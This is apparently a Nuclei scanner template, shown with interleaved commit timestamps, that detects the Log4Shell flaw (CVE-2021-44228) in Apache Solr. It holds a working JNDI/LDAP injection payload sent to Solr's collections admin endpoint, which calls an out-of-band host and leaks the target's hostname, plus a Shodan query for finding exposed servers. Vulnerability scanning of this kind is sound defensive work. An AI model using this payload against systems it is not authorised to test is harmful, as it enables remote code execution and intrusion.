2021-12-15 15:45:43 +00:00
id : apache-solr-log4j-rce
info :
2022-10-10 19:51:42 +00:00
name : Apache Solr 7+ - Remote Code Execution (Apache Log4j)
2021-12-15 15:45:43 +00:00
author : Evan Rubinstein,nvn1729
severity : critical
2022-05-31 08:43:47 +00:00
description : |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
2021-12-15 15:45:43 +00:00
reference :
2021-12-15 15:50:18 +00:00
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
2021-12-15 15:45:43 +00:00
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
2022-07-16 17:08:06 +00:00
- https://logging.apache.org/log4j/2.x/security.html
2022-05-27 15:55:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification :
2022-10-10 20:06:39 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
2022-10-10 19:51:42 +00:00
cve-id : CVE-2021-44228
2022-10-19 21:11:27 +00:00
cwe-id : CWE-77
2022-07-18 06:34:43 +00:00
metadata :
shodan-query : http.html:"Apache Solr"
2022-10-10 20:06:39 +00:00
verified : "true"
tags : cve,cve2021,solr,oast,log4j,rce,apache,jndi,kev
2021-12-15 15:45:43 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D"
matchers-condition : and
matchers :
2023-01-11 06:34:21 +00:00
- type : word
part : body
words :
- "String index out of range"
2021-12-15 15:45:43 +00:00
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
- type : regex
part : interactsh_request
regex :
2023-01-11 06:34:21 +00:00
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
2021-12-15 15:45:43 +00:00
extractors :
2023-01-11 06:34:21 +00:00
- type : kval
kval :
- interactsh_ip # Print remote interaction IP in output
2021-12-15 15:45:43 +00:00
- type : regex
part : interactsh_request
group : 1
regex :
2023-01-11 06:34:21 +00:00
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
2022-05-27 15:51:56 +00:00
# Enhanced by mp on 2022/05/27